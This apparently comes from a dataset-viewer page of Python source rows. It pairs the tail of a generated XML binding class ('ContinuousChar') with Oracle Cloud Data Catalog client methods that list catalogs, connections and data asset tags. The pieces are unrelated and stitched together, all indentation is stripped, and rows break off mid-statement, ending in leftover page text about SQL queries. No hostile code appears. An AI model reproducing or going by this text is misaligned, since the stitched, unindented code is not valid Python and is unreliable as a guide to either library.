return ContinuousChar.subclass(*args_, **kwargs_)
else:
return ContinuousChar(*args_, **kwargs_)
factory = staticmethod(factory)
def get_meta(self): return self.meta
def set_meta(self, meta): self.meta = meta
def add_meta(self, value): self.meta.append(value)
def insert_meta(self, index, value): self.meta[index] = value
def get_states(self): return self.states
def set_states(self, states): self.states = states
def get_tokens(self): return self.tokens
def set_tokens(self, tokens): self.tokens = tokens
def validate_MSTokenLength(self, value):
# Validate type MSTokenLength, a restriction on xs:positiveInteger.
pass
def get_codon(self): return self.codon
def set_codon(self, codon): self.codon = codon
def validate_CodonPosition(self, value):
# Validate type CodonPosition, a restriction on xs:nonNegativeInteger.
pass
def export(self, outfile, level, namespace_='', name_='ContinuousChar', namespacedef_=''):
showIndent(outfile, level)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = []
self.exportAttributes(outfile, level, already_processed, namespace_, name_='ContinuousChar')
if self.hasContent_():
outfile.write('>\n')
| |
should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://oracle-cloud-infrastructure-python-sdk.readthedocs.io/en/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type list of :class:`~oci.data_catalog.models.CatalogSummary`
:rtype: :class:`~oci.response.Response`
"""
resource_path = "/catalogs"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"display_name",
"limit",
"page",
"lifecycle_state",
"sort_order",
"sort_by",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_catalogs got unknown kwargs: {!r}".format(extra_kwargs))
if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
if 'sort_by' in kwargs:
sort_by_allowed_values = ["TIMECREATED", "DISPLAYNAME"]
if kwargs['sort_by'] not in sort_by_allowed_values:
raise ValueError(
"Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
)
query_params = {
"compartmentId": compartment_id,
"displayName": kwargs.get("display_name", missing),
"limit": kwargs.get("limit", missing),
"page": kwargs.get("page", missing),
"lifecycleState": kwargs.get("lifecycle_state", missing),
"sortOrder": kwargs.get("sort_order", missing),
"sortBy": kwargs.get("sort_by", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
query_params=query_params,
header_params=header_params,
response_type="list[CatalogSummary]")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
query_params=query_params,
header_params=header_params,
response_type="list[CatalogSummary]")
def list_connections(self, catalog_id, data_asset_key, **kwargs):
"""
Returns a list of all Connections for a data asset.
:param str catalog_id: (required)
Unique catalog identifier.
:param str data_asset_key: (required)
Unique data asset key.
:param str display_name: (optional)
A filter to return only resources that match the entire display name given. The match is not case sensitive.
:param str lifecycle_state: (optional)
A filter to return only resources that match the specified lifecycle state. The value is case insensitive.
:param datetime time_created: (optional)
Time that the resource was created. An `RFC3339`__ formatted datetime string.
__ https://tools.ietf.org/html/rfc3339
:param datetime time_updated: (optional)
Time that the resource was updated. An `RFC3339`__ formatted datetime string.
__ https://tools.ietf.org/html/rfc3339
:param str created_by_id: (optional)
OCID of the user who created the resource.
:param str updated_by_id: (optional)
OCID of the user who updated the resource.
:param str external_key: (optional)
Unique external identifier of this resource in the external source system.
:param datetime time_status_updated: (optional)
Time that the resource's status was last updated. An `RFC3339`__ formatted datetime string.
__ https://tools.ietf.org/html/rfc3339
:param bool is_default: (optional)
Indicates whether this connection is the default connection.
:param list[str] fields: (optional)
Specifies the fields to return in a connection summary response.
Allowed values are: "key", "displayName", "description", "dataAssetKey", "typeKey", "timeCreated", "externalKey", "lifecycleState", "isDefault", "uri"
:param str sort_by: (optional)
The field to sort by. Only one sort order may be provided. Default order for TIMECREATED is descending. Default order for DISPLAYNAME is ascending. If no value is specified TIMECREATED is default.
Allowed values are: "TIMECREATED", "DISPLAYNAME"
:param str sort_order: (optional)
The sort order to use, either 'asc' or 'desc'.
Allowed values are: "ASC", "DESC"
:param int limit: (optional)
The maximum number of items to return.
:param str page: (optional)
The page token representing the page at which to start retrieving results. This is usually retrieved from a previous list call.
:param str opc_request_id: (optional)
The client request ID for tracing.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://oracle-cloud-infrastructure-python-sdk.readthedocs.io/en/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_catalog.models.ConnectionCollection`
:rtype: :class:`~oci.response.Response`
"""
resource_path = "/catalogs/{catalogId}/dataAssets/{dataAssetKey}/connections"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"display_name",
"lifecycle_state",
"time_created",
"time_updated",
"created_by_id",
"updated_by_id",
"external_key",
"time_status_updated",
"is_default",
"fields",
"sort_by",
"sort_order",
"limit",
"page",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_connections got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"catalogId": catalog_id,
"dataAssetKey": data_asset_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
if 'fields' in kwargs:
fields_allowed_values = ["key", "displayName", "description", "dataAssetKey", "typeKey", "timeCreated", "externalKey", "lifecycleState", "isDefault", "uri"]
for fields_item in kwargs['fields']:
if fields_item not in fields_allowed_values:
raise ValueError(
"Invalid value for `fields`, must be one of {0}".format(fields_allowed_values)
)
if 'sort_by' in kwargs:
sort_by_allowed_values = ["TIMECREATED", "DISPLAYNAME"]
if kwargs['sort_by'] not in sort_by_allowed_values:
raise ValueError(
"Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
)
if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
query_params = {
"displayName": kwargs.get("display_name", missing),
"lifecycleState": kwargs.get("lifecycle_state", missing),
"timeCreated": kwargs.get("time_created", missing),
"timeUpdated": kwargs.get("time_updated", missing),
"createdById": kwargs.get("created_by_id", missing),
"updatedById": kwargs.get("updated_by_id", missing),
"externalKey": kwargs.get("external_key", missing),
"timeStatusUpdated": kwargs.get("time_status_updated", missing),
"isDefault": kwargs.get("is_default", missing),
"fields": self.base_client.generate_collection_format_param(kwargs.get("fields", missing), 'multi'),
"sortBy": kwargs.get("sort_by", missing),
"sortOrder": kwargs.get("sort_order", missing),
"limit": kwargs.get("limit", missing),
"page": kwargs.get("page", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="ConnectionCollection")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="ConnectionCollection")
def list_data_asset_tags(self, catalog_id, data_asset_key, **kwargs):
"""
Returns a list of all tags for a data asset.
:param str catalog_id: (required)
Unique catalog identifier.
:param str data_asset_key: (required)
Unique data asset key.
:param str name: (optional)
Immutable resource name.
:param str lifecycle_state: (optional)
A filter to return only resources that match the specified lifecycle state. The value is case insensitive.
:param str term_key: (optional)
Unique key of the related term.
:param str term_path: (optional)
Path of the related term.
:param datetime time_created: (optional)
Time that the resource was created. An `RFC3339`__ formatted datetime string.
__ https://tools.ietf.org/html/rfc3339
:param str created_by_id: (optional)
OCID of the user who created the resource.
:param list[str] fields: (optional)
Specifies the fields to return in a data asset tag summary response.
Allowed values are: "key", "name", "termKey", "termPath", "termDescription", "lifecycleState", "timeCreated", "uri", "glossaryKey", "dataAssetKey"
:param str sort_by: (optional)
The field to sort by. Only one sort order may be provided. Default order for TIMECREATED is descending. Default order for DISPLAYNAME is ascending. If no value is specified TIMECREATED is default.
Allowed values are: "TIMECREATED", "DISPLAYNAME"
:param str sort_order: (optional)
The sort order to use, either 'asc' or 'desc'.
Allowed values are: "ASC", "DESC"
:param int limit: (optional)
The maximum number of items to return.
:param str page: (optional)
The page token representing the page at which to start retrieving results. This is usually retrieved from a previous list call.
:param str opc_request_id: (optional)
The client request ID for tracing.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://oracle-cloud-infrastructure-python-sdk.readthedocs.io/en/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_catalog.models.DataAssetTagCollection`
:rtype: :class:`~oci.response.Response`
"""
resource_path = "/catalogs/{catalogId}/dataAssets/{dataAssetKey}/tags"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.